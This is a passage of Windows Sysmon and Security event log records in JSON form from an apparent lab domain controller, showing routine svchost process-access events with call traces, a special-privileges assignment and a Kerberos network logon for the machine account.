C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220383,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4AAB1\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4aab1","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220384,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4AAB1\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t49703\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4aab1","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"49703","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2606,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2607,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2608,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2609,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2610,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2611,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\S